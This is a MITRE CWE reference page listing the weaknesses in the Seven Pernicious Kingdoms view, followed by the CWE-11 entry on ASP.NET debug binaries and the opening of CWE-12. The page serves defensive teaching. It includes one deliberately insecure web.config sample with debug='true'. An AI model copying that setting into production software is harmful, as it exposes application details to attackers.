CWE

Common Weakness Enumeration

A Community-Developed List of Software Weakness Types

CWE VIEW: Seven Pernicious Kingdoms

View ID: 700
Structure: Graph
Status: Incomplete
+ View Data

View Objective

This view (graph) organizes weaknesses using a hierarchical structure that is similar to that used by Seven Pernicious Kingdoms.

+ View Audience
Stakeholder: Developers

This view is useful for developers because it is organized around concepts with which developers are familiar, and it focuses on weaknesses that can be detected using source code analysis tools.

+ Alternate Terms
7PK:

"7PK" is frequently used by the MITRE team as an abbreviation.

+ Relationships
700 - Seven Pernicious Kingdoms
+ Category: Environment - (2)
700 (Seven Pernicious Kingdoms) > 2 (Environment)
Weaknesses in this category are typically introduced during unexpected environmental conditions.
* Weakness Variant: ASP.NET Misconfiguration: Creating Debug Binary - (11)
700 (Seven Pernicious Kingdoms) > 2 (Environment) > 11 (ASP.NET Misconfiguration: Creating Debug Binary)
Debugging messages help attackers learn about the system and plan a form of attack.
* Weakness Variant: ASP.NET Misconfiguration: Missing Custom Error Page - (12)
700 (Seven Pernicious Kingdoms) > 2 (Environment) > 12 (ASP.NET Misconfiguration: Missing Custom Error Page)
An ASP.NET application must enable custom error pages in order to prevent attackers from mining information from the framework's built-in responses.
* Weakness Variant: ASP.NET Misconfiguration: Password in Configuration File - (13)
700 (Seven Pernicious Kingdoms) > 2 (Environment) > 13 (ASP.NET Misconfiguration: Password in Configuration File)
Storing a plaintext password in a configuration file allows anyone who can read the file to access the password-protected resource, making it an easy target for attackers.
* Weakness Base: Compiler Removal of Code to Clear Buffers - (14)
700 (Seven Pernicious Kingdoms) > 2 (Environment) > 14 (Compiler Removal of Code to Clear Buffers)
Sensitive memory is cleared according to the source code, but compiler optimizations leave the memory untouched when it is not read from again, aka "dead store removal."
* Weakness Variant: J2EE Misconfiguration: Data Transmission Without Encryption - (5)
700 (Seven Pernicious Kingdoms) > 2 (Environment) > 5 (J2EE Misconfiguration: Data Transmission Without Encryption)
Information sent over a network can be compromised while in transit. An attacker may be able to read or modify the contents if the data are sent in plaintext or are weakly encrypted.
* Weakness Variant: J2EE Misconfiguration: Entity Bean Declared Remote - (8)
700 (Seven Pernicious Kingdoms) > 2 (Environment) > 8 (J2EE Misconfiguration: Entity Bean Declared Remote)
When an application exposes a remote interface for an entity bean, it might also expose methods that get or set the bean's data. These methods could be leveraged to read sensitive information, or to change data in ways that violate the application's expectations, potentially leading to other vulnerabilities.
* Weakness Variant: J2EE Misconfiguration: Insufficient Session-ID Length - (6)
700 (Seven Pernicious Kingdoms) > 2 (Environment) > 6 (J2EE Misconfiguration: Insufficient Session-ID Length)
The J2EE application is configured to use an insufficient session ID length.
* Weakness Variant: J2EE Misconfiguration: Missing Custom Error Page - (7)
700 (Seven Pernicious Kingdoms) > 2 (Environment) > 7 (J2EE Misconfiguration: Missing Custom Error Page)
The default error page of a web application should not display sensitive information about the software system.
* Weakness Variant: J2EE Misconfiguration: Weak Access Permissions for EJB Methods - (9)
700 (Seven Pernicious Kingdoms) > 2 (Environment) > 9 (J2EE Misconfiguration: Weak Access Permissions for EJB Methods)
If elevated access rights are assigned to EJB methods, then an attacker can take advantage of the permissions to exploit the software system.
+ Category: Error Handling - (388)
700 (Seven Pernicious Kingdoms) > 388 (Error Handling)
This category includes weaknesses that occur when an application does not properly handle errors that occur during processing.
* Weakness Base: Declaration of Catch for Generic Exception - (396)
700 (Seven Pernicious Kingdoms) > 388 (Error Handling) > 396 (Declaration of Catch for Generic Exception)
Catching overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.
* Weakness Base: Declaration of Throws for Generic Exception - (397)
700 (Seven Pernicious Kingdoms) > 388 (Error Handling) > 397 (Declaration of Throws for Generic Exception)
Throwing overly broad exceptions promotes complex error handling code that is more likely to contain security vulnerabilities.
* Weakness Base: Unchecked Error Condition - (391)
700 (Seven Pernicious Kingdoms) > 388 (Error Handling) > 391 (Unchecked Error Condition)
Ignoring exceptions and other error conditions may allow an attacker to induce unexpected behavior unnoticed.
* Weakness Base: Use of NullPointerException Catch to Detect NULL Pointer Dereference - (395)
700 (Seven Pernicious Kingdoms) > 388 (Error Handling) > 395 (Use of NullPointerException Catch to Detect NULL Pointer Dereference)
Catching NullPointerException should not be used as an alternative to programmatic checks to prevent dereferencing a null pointer.
+ Weakness Class: Improper Fulfillment of API Contract ('API Abuse') - (227)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse'))
The software uses an API in a manner contrary to its intended use. (Alternate term: API Abuse)
* Weakness Variant: Creation of chroot Jail Without Changing Working Directory - (243)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse')) > 243 (Creation of chroot Jail Without Changing Working Directory)
The program uses the chroot() system call to create a jail, but does not change the working directory afterward. This does not prevent access to files outside of the jail.
* Weakness Class: Execution with Unnecessary Privileges - (250)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse')) > 250 (Execution with Unnecessary Privileges)
The software performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses.
* Weakness Variant: Improper Clearing of Heap Memory Before Release ('Heap Inspection') - (244)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse')) > 244 (Improper Clearing of Heap Memory Before Release ('Heap Inspection'))
Using realloc() to resize buffers that store sensitive information can leave the sensitive information exposed to attack, because it is not removed from memory.
* Weakness Variant: J2EE Bad Practices: Direct Management of Connections - (245)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse')) > 245 (J2EE Bad Practices: Direct Management of Connections)
The J2EE application directly manages connections, instead of using the container's connection management facilities.
* Weakness Variant: J2EE Bad Practices: Direct Use of Sockets - (246)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse')) > 246 (J2EE Bad Practices: Direct Use of Sockets)
The J2EE application directly uses sockets instead of using framework method calls.
* Category: Often Misused: String Management - (251)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse')) > 251 (Often Misused: String Management)
Functions that manipulate strings encourage buffer overflows.
* Weakness Base: Uncaught Exception - (248)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse')) > 248 (Uncaught Exception)
An exception is thrown from a function, but it is not caught.
* Weakness Base: Unchecked Return Value - (252)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse')) > 252 (Unchecked Return Value)
The software does not check the return value from a method or function, which can prevent it from detecting unexpected states and conditions.
* Weakness Base: Use of Inherently Dangerous Function - (242)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse')) > 242 (Use of Inherently Dangerous Function)
The program calls a function that can never be guaranteed to work safely.
* Weakness Variant: Use of getlogin() in Multithreaded Application - (558)
700 (Seven Pernicious Kingdoms) > 227 (Improper Fulfillment of API Contract ('API Abuse')) > 558 (Use of getlogin() in Multithreaded Application)
The application uses the getlogin() function in a multithreaded context, potentially causing it to return incorrect values.
+ Weakness Class: Indicator of Poor Code Quality - (398)
700 (Seven Pernicious Kingdoms) > 398 (Indicator of Poor Code Quality)
The code has features that do not directly introduce a weakness or vulnerability, but indicate that the product has not been carefully developed or maintained.
* Weakness Variant: Double Free - (415)
700 (Seven Pernicious Kingdoms) > 398 (Indicator of Poor Code Quality) > 415 (Double Free)
The product calls free() twice on the same memory address, potentially leading to modification of unexpected memory locations. (Alternate term: Double-free)
* Weakness Base: Improper Release of Memory Before Removing Last Reference ('Memory Leak') - (401)
700 (Seven Pernicious Kingdoms) > 398 (Indicator of Poor Code Quality) > 401 (Improper Release of Memory Before Removing Last Reference ('Memory Leak'))
The software does not sufficiently track and release allocated memory after it has been used, which slowly consumes remaining memory. (Alternate term: Memory Leak)
* Weakness Base: Improper Resource Shutdown or Release - (404)
700 (Seven Pernicious Kingdoms) > 398 (Indicator of Poor Code Quality) > 404 (Improper Resource Shutdown or Release)
The program does not release or incorrectly releases a resource before it is made available for re-use.
* Weakness Base: NULL Pointer Dereference - (476)
700 (Seven Pernicious Kingdoms) > 398 (Indicator of Poor Code Quality) > 476 (NULL Pointer Dereference)
A NULL pointer dereference occurs when the application dereferences a pointer that it expects to be valid, but is NULL, typically causing a crash or exit.
* Weakness Base: Undefined Behavior for Input to API - (475)
700 (Seven Pernicious Kingdoms) > 398 (Indicator of Poor Code Quality) > 475 (Undefined Behavior for Input to API)
The behavior of this function is undefined unless its control parameter is set to a specific value.
* Weakness Base: Use After Free - (416)
700 (Seven Pernicious Kingdoms) > 398 (Indicator of Poor Code Quality) > 416 (Use After Free)
Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code. (Alternate terms: Dangling pointer, Use-After-Free)
* Weakness Base: Use of Function with Inconsistent Implementations - (474)
700 (Seven Pernicious Kingdoms) > 398 (Indicator of Poor Code Quality) > 474 (Use of Function with Inconsistent Implementations)
The code uses a function that has inconsistent implementations across operating systems and versions.
* Weakness Base: Use of Obsolete Functions - (477)
700 (Seven Pernicious Kingdoms) > 398 (Indicator of Poor Code Quality) > 477 (Use of Obsolete Functions)
The code uses deprecated or obsolete functions, which suggests that the code has not been actively reviewed or maintained.
* Weakness Variant: Use of Uninitialized Variable - (457)
700 (Seven Pernicious Kingdoms) > 398 (Indicator of Poor Code Quality) > 457 (Use of Uninitialized Variable)
The code uses a variable that has not been initialized, leading to unpredictable or unintended results.
+ Category: Input Validation and Representation - (1005)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation)
This category represents one of the phyla in the Seven Pernicious Kingdoms vulnerability classification. It includes weaknesses that exist when an application does not properly validate or represent input.
* Weakness Base: Improper Control of Resource Identifiers ('Resource Injection') - (99)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 99 (Improper Control of Resource Identifiers ('Resource Injection'))
The software receives input from an upstream component, but it does not restrict or incorrectly restricts the input before it is used as an identifier for a resource that may be outside the intended sphere of control. (Alternate term: Insecure Direct Object Reference)
+ Weakness Class: Improper Input Validation - (20)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation)
The product does not validate or incorrectly validates input that can affect the control flow or data flow of a program.
* Weakness Base: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') - (120)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 120 (Buffer Copy without Checking Size of Input ('Classic Buffer Overflow'))
The program copies an input buffer to an output buffer without verifying that the size of the input buffer is less than the size of the output buffer, leading to a buffer overflow. (Alternate terms: buffer overrun, Unbounded Transfer)
* Weakness Base: Direct Use of Unsafe JNI - (111)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 111 (Direct Use of Unsafe JNI)
When a Java application uses the Java Native Interface (JNI) to call code written in another programming language, it can expose the application to weaknesses in that code, even if those weaknesses cannot occur in Java.
* Weakness Class: External Control of File Name or Path - (73)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 73 (External Control of File Name or Path)
The software allows user input to control or influence paths or file names that are used in filesystem operations.
* Weakness Base: External Control of System or Configuration Setting - (15)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 15 (External Control of System or Configuration Setting)
One or more system settings or configuration elements can be externally controlled by a user.
* Weakness Base: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting') - (113)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 113 (Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting'))
The software receives data from an upstream component, but does not neutralize or incorrectly neutralizes CR and LF characters before the data is included in outgoing HTTP headers.
* Weakness Base: Improper Null Termination - (170)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 170 (Improper Null Termination)
The software does not terminate or incorrectly terminates a string or array with a null character or equivalent terminator.
* Weakness Base: Improper Output Neutralization for Logs - (117)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 117 (Improper Output Neutralization for Logs)
The software does not neutralize or incorrectly neutralizes output that is written to logs.
* Weakness Class: Improper Restriction of Operations within the Bounds of a Memory Buffer - (119)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 119 (Improper Restriction of Operations within the Bounds of a Memory Buffer)
The software performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer. (Alternate term: Memory Corruption)
* Weakness Base: Integer Overflow or Wraparound - (190)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 190 (Integer Overflow or Wraparound)
The software performs a calculation that can produce an integer overflow or wraparound, when the logic assumes that the resulting value will always be larger than the original value. This can introduce other weaknesses when the calculation is used for resource management or execution control.
* Weakness Base: Missing XML Validation - (112)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 112 (Missing XML Validation)
The software accepts XML from an untrusted source but does not validate the XML against the proper schema.
* Weakness Base: Process Control - (114)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 114 (Process Control)
Executing commands or loading libraries from an untrusted source or in an untrusted environment can cause an application to execute malicious commands (and payloads) on behalf of an attacker.
* Weakness Base: Return of Pointer Value Outside of Expected Range - (466)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 466 (Return of Pointer Value Outside of Expected Range)
A function can return a pointer to memory that is outside of the buffer that the pointer is expected to reference.
* Weakness Variant: Struts: Duplicate Validation Forms - (102)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 102 (Struts: Duplicate Validation Forms)
The application uses multiple validation forms with the same name, which might cause the Struts Validator to validate a form that the programmer does not expect.
* Weakness Variant: Struts: Form Bean Does Not Extend Validation Class - (104)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 104 (Struts: Form Bean Does Not Extend Validation Class)
If a form bean does not extend an ActionForm subclass of the Validator framework, it can expose the application to other weaknesses related to insufficient input validation.
* Weakness Variant: Struts: Form Field Without Validator - (105)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 105 (Struts: Form Field Without Validator)
The application has a form field that is not validated by a corresponding validation form, which can introduce other weaknesses related to insufficient input validation.
* Weakness Variant: Struts: Incomplete validate() Method Definition - (103)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 103 (Struts: Incomplete validate() Method Definition)
The application has a validator form that either does not define a validate() method, or defines a validate() method but does not call super.validate().
* Weakness Variant: Struts: Plug-in Framework not in Use - (106)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 106 (Struts: Plug-in Framework not in Use)
When an application does not use an input validation framework such as the Struts Validator, there is a greater risk of introducing weaknesses related to insufficient input validation.
* Weakness Variant: Struts: Unused Validation Form - (107)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 107 (Struts: Unused Validation Form)
An unused validation form indicates that validation logic is not up-to-date.
* Weakness Variant: Struts: Unvalidated Action Form - (108)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 108 (Struts: Unvalidated Action Form)
Every Action Form must have a corresponding validation form.
* Weakness Variant: Struts: Validator Turned Off - (109)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 109 (Struts: Validator Turned Off)
Automatic filtering via a Struts bean has been turned off, which disables the Struts Validator and custom validation logic. This exposes the application to other weaknesses related to insufficient input validation.
* Weakness Variant: Struts: Validator Without Form Field - (110)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 110 (Struts: Validator Without Form Field)
Validation fields that do not appear in forms they are associated with indicate that the validation logic is out of date.
* Weakness Base: Use of Externally-Controlled Format String - (134)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 134 (Use of Externally-Controlled Format String)
The software uses a function that accepts a format string as an argument, but the format string originates from an external source.
* Weakness Base: Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') - (470)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 470 (Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection'))
The application uses external input with reflection to select which classes or code to use, but it does not sufficiently prevent the input from selecting improper classes or code. (Alternate term: Reflection Injection)
* Weakness Variant: Use of Path Manipulation Function without Maximum-sized Buffer - (785)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 20 (Improper Input Validation) > 785 (Use of Path Manipulation Function without Maximum-sized Buffer)
The software invokes a function for normalizing paths or file names, but it provides an output buffer that is smaller than the maximum possible size, such as PATH_MAX.
* Weakness Base: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') - (79)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 79 (Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'))
The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. (Alternate terms: XSS, CSS)
* Weakness Class: Improper Neutralization of Special Elements used in a Command ('Command Injection') - (77)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 77 (Improper Neutralization of Special Elements used in a Command ('Command Injection'))
The software constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
* Weakness Base: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') - (89)
700 (Seven Pernicious Kingdoms) > 1005 (Input Validation and Representation) > 89 (Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'))
The software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component.
+ Weakness Class: Insufficient Encapsulation - (485)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation)
The product does not sufficiently encapsulate critical data or functionality.
* Weakness Variant: Comparison of Classes by Name - (486)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 486 (Comparison of Classes by Name)
The program compares classes by name, which can cause it to use the wrong class when multiple classes can have the same name.
* Weakness Variant: Critical Public Variable Without Final Modifier - (493)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 493 (Critical Public Variable Without Final Modifier)
The product has a critical public variable that is not final, which allows the variable to be modified to contain unexpected values.
* Weakness Variant: Exposure of Data Element to Wrong Session - (488)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 488 (Exposure of Data Element to Wrong Session)
The product does not sufficiently enforce boundaries between the states of different sessions, causing data to be provided to, or used by, the wrong session.
* Weakness Variant: Exposure of System Data to an Unauthorized Control Sphere - (497)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 497 (Exposure of System Data to an Unauthorized Control Sphere)
Exposing system data or debugging information helps an adversary learn about the system and form an attack plan.
* Weakness Base: Leftover Debug Code - (489)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 489 (Leftover Debug Code)
The application can be deployed with active debugging code that can create unintended entry points.
* Category: Mobile Code Issues - (490)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 490 (Mobile Code Issues)
Weaknesses in this category are frequently found in mobile code.
* Weakness Variant: Private Array-Typed Field Returned From A Public Method - (495)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 495 (Private Array-Typed Field Returned From A Public Method)
The product has a method that is declared public, but returns a reference to a private array, which could then be modified in unexpected ways.
* Weakness Variant: Public Data Assigned to Private Array-Typed Field - (496)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 496 (Public Data Assigned to Private Array-Typed Field)
Assigning public data to a private array is equivalent to giving public access to the array.
* Weakness Variant: Public cloneable() Method Without Final ('Object Hijack') - (491)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 491 (Public cloneable() Method Without Final ('Object Hijack'))
A class has a cloneable() method that is not declared final, which allows an object to be created without calling the constructor. This can cause the object to be in an unexpected state.
* Weakness Base: Trust Boundary Violation - (501)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 501 (Trust Boundary Violation)
The product mixes trusted and untrusted data in the same data structure or structured message.
* Weakness Variant: Use of Inner Class Containing Sensitive Data - (492)
700 (Seven Pernicious Kingdoms) > 485 (Insufficient Encapsulation) > 492 (Use of Inner Class Containing Sensitive Data)
Inner classes are translated into classes that are accessible at package scope, which may expose to attackers code that the programmer intended to keep private.
+ Category: Security Features - (254)
700 (Seven Pernicious Kingdoms) > 254 (Security Features)
Software security is not security software. Here we're concerned with topics like authentication, access control, confidentiality, cryptography, and privilege management.
* Weakness Variant: Empty Password in Configuration File - (258)
700 (Seven Pernicious Kingdoms) > 254 (Security Features) > 258 (Empty Password in Configuration File)
Using an empty string as a password is insecure.
* Weakness Class: Exposure of Private Information ('Privacy Violation') - (359)
700 (Seven Pernicious Kingdoms) > 254 (Security Features) > 359 (Exposure of Private Information ('Privacy Violation'))
The software does not properly prevent private data (such as credit card numbers) from being accessed by actors who either (1) are not explicitly authorized to access the data or (2) do not have the implicit consent of the people to whom the data relates. (Alternate terms: Privacy leak, Privacy leakage)
* Weakness Class: Improper Authorization - (285)
700 (Seven Pernicious Kingdoms) > 254 (Security Features) > 285 (Improper Authorization)
The software does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action. (Alternate term: AuthZ)
* Weakness Base: Least Privilege Violation - (272)
700 (Seven Pernicious Kingdoms) > 254 (Security Features) > 272 (Least Privilege Violation)
The elevated privilege level required to perform operations such as chroot() should be dropped immediately after the operation is performed.
* Weakness Variant: Password in Configuration File - (260)
700 (Seven Pernicious Kingdoms) > 254 (Security Features) > 260 (Password in Configuration File)
The software stores a password in a configuration file that might be accessible to actors who do not know the password.
* Weakness Variant: Plaintext Storage of a Password - (256)
700 (Seven Pernicious Kingdoms) > 254 (Security Features) > 256 (Plaintext Storage of a Password)
Storing a password in plaintext may result in a system compromise.
* Weakness Base: Use of Hard-coded Credentials - (798)
700 (Seven Pernicious Kingdoms) > 254 (Security Features) > 798 (Use of Hard-coded Credentials)
The software contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data.
* Weakness Base: Use of Hard-coded Password - (259)
700 (Seven Pernicious Kingdoms) > 254 (Security Features) > 259 (Use of Hard-coded Password)
The software contains a hard-coded password, which it uses for its own inbound authentication or for outbound communication to external components.
* Weakness Class: Use of Insufficiently Random Values - (330)
700 (Seven Pernicious Kingdoms) > 254 (Security Features) > 330 (Use of Insufficiently Random Values)
The software may use insufficiently random numbers or values in a security context that depends on unpredictable numbers.
* Weakness Variant: Weak Cryptography for Passwords - (261)
700 (Seven Pernicious Kingdoms) > 254 (Security Features) > 261 (Weak Cryptography for Passwords)
Obscuring a password with a trivial encoding does not protect the password.
+ Category: Time and State - (361)
700 (Seven Pernicious Kingdoms) > 361 (Time and State)
Weaknesses in this category are related to the improper management of time and state in an environment that supports simultaneous or near-simultaneous computation by multiple systems, processes, or threads.
* Weakness Base: Insecure Temporary File - (377)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 377 (Insecure Temporary File)
Creating and using insecure temporary files can leave application and system data vulnerable to attack.
* Weakness Variant: J2EE Bad Practices: Direct Use of Threads - (383)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 383 (J2EE Bad Practices: Direct Use of Threads)
Thread management in a Web application is forbidden in some circumstances and is always highly error prone.
* Weakness Variant: J2EE Bad Practices: Use of System.exit() - (382)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 382 (J2EE Bad Practices: Use of System.exit())
A J2EE application uses System.exit(), which also shuts down its container.
+ Compound Element (Composite): Session Fixation - (384)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 384 (Session Fixation)
Authenticating a user, or otherwise establishing a new user session, without invalidating any existing session identifier gives an attacker the opportunity to steal authenticated sessions.
* Weakness Base: External Control of Assumed-Immutable Web Parameter - (472)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 384 (Session Fixation) > 472 (External Control of Assumed-Immutable Web Parameter)
The web application does not sufficiently verify inputs that are assumed to be immutable but are actually externally controllable, such as hidden form fields. (Alternate term: Assumed-Immutable Parameter Tampering)
* Weakness Base: Origin Validation Error - (346)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 384 (Session Fixation) > 346 (Origin Validation Error)
The software does not properly verify that the source of data or communication is valid.
* Weakness Class: Unintended Proxy or Intermediary ('Confused Deputy') - (441)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 384 (Session Fixation) > 441 (Unintended Proxy or Intermediary ('Confused Deputy'))
The software receives a request, message, or directive from an upstream component, but the software does not sufficiently preserve the original source of the request before forwarding the request to an external actor that is outside of the software's control sphere. This causes the software to appear to be the source of the request, leading it to act as a proxy or other intermediary between the upstream component and the external actor. (Alternate term: Confused Deputy)
* Weakness Base: Signal Handler Race Condition - (364)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 364 (Signal Handler Race Condition)
The software uses a signal handler that introduces a race condition.
* Category: Temporary File Issues - (376)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 376 (Temporary File Issues)
Weaknesses in this category are related to improper handling of temporary files.
* Weakness Base: Time-of-check Time-of-use (TOCTOU) Race Condition - (367)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 367 (Time-of-check Time-of-use (TOCTOU) Race Condition)
The software checks the state of a resource before using that resource, but the resource's state can change between the check and the use in a way that invalidates the results of the check. This can cause the software to perform invalid actions when the resource is in an unexpected state. (Alternate terms: TOCTTOU, TOCCTOU)
* Weakness Base: Unrestricted Externally Accessible Lock - (412)
700 (Seven Pernicious Kingdoms) > 361 (Time and State) > 412 (Unrestricted Externally Accessible Lock)
The software properly checks for the existence of a lock, but the lock can be externally controlled or influenced by an actor that is outside of the intended sphere of control.
+ Content History
Submissions
2008-09-09: MITRE (Internal CWE Team)
Modifications
2017-05-03: CWE Content Team, MITRE (Internal); updated Relationships
+ View Metrics
Total: 98 out of 1006
Views: 0 out of 33
Categories: 8 out of 245
Weaknesses: 89 out of 720
Compound Elements: 1 out of 8
View Components

CWE-11: ASP.NET Misconfiguration: Creating Debug Binary

Weakness ID: 11
Abstraction: Variant
Status: Draft
+ Description

Description Summary

Debugging messages help attackers learn about the system and plan a form of attack.

Extended Description

ASP .NET applications can be configured to produce debug binaries. These binaries give detailed debugging messages and should not be used in production environments. Debug binaries are meant to be used in a development or testing environment and can pose a security risk if they are deployed to production.

+ Time of Introduction
  • Implementation
  • Operation
+ Applicable Platforms

Languages

.NET

+ Common Consequences
Scope: Confidentiality

Technical Impact: Read application data

Attackers can leverage the additional information they gain from debugging output to mount attacks targeted on the framework, database, or other resources used by the application.

+ Demonstrative Examples

Example 1

The file web.config contains the debug mode setting. Setting debug to "true" will let the browser display debugging information.

(Bad Code)
Example Language: XML 
<?xml version="1.0" encoding="utf-8" ?>
<configuration>
<system.web>
<compilation
defaultLanguage="c#"
debug="true"
/>
...
</system.web>
</configuration>

Change the debug mode to false when the application is deployed into production.

+ Potential Mitigations

Phase: System Configuration

Avoid releasing debug binaries into the production environment. Change the debug mode to false when the application is deployed into production.

+ Background Details

The debug attribute of the <compilation> tag defines whether compiled binaries should include debugging information. The use of debug binaries causes an application to provide as much information about itself as possible to the user.

+ Relationships
ChildOf Category 2: Environment (view 700, Seven Pernicious Kingdoms, primary)
ChildOf Category 10: ASP.NET Environment Issues (view 699, Development Concepts, primary)
ChildOf Weakness Variant 215: Information Exposure Through Debug Information (view 1000, Research Concepts, primary)
ChildOf Category 963: SFP Secondary Cluster: Exposed Data (view 888, Software Fault Pattern (SFP) Clusters, primary)
+ Taxonomy Mappings
Mapped Taxonomy Name: 7 Pernicious Kingdoms; Mapped Node Name: ASP.NET Misconfiguration: Creating Debug Binary
+ Content History
Submissions
7 Pernicious Kingdoms (Externally Mined)
Modifications
2008-07-01: Eric Dalci, Cigital (External); updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction
2008-09-08: CWE Content Team, MITRE (Internal); updated Relationships, Other_Notes, Taxonomy_Mappings
2008-11-24: CWE Content Team, MITRE (Internal); updated Description, Other_Notes
2009-07-27: CWE Content Team, MITRE (Internal); updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Other_Notes
2011-06-01: CWE Content Team, MITRE (Internal); updated Common_Consequences
2011-06-27: CWE Content Team, MITRE (Internal); updated Common_Consequences
2012-05-11: CWE Content Team, MITRE (Internal); updated Relationships
2013-02-21: CWE Content Team, MITRE (Internal); updated Potential_Mitigations
2014-07-30: CWE Content Team, MITRE (Internal); updated Relationships

CWE-12: ASP.NET Misconfiguration: Missing Custom Error Page

Weakness ID: 12
Abstraction: Variant
Status: Draft
+ Description

Description Summary

An ASP .NET application must enable custom error pages in order to prevent attackers from mining information from the framework's built-in responses.
+ Time of Introduction
  • Implementation
  • Operation
+ Applicable Platforms

Languages

.NET

+ Common Consequences
Scope: Confidentiality

Technical Impact: Read application data

Default error pages give detailed information about the error that occurred and should not be used in production environments.

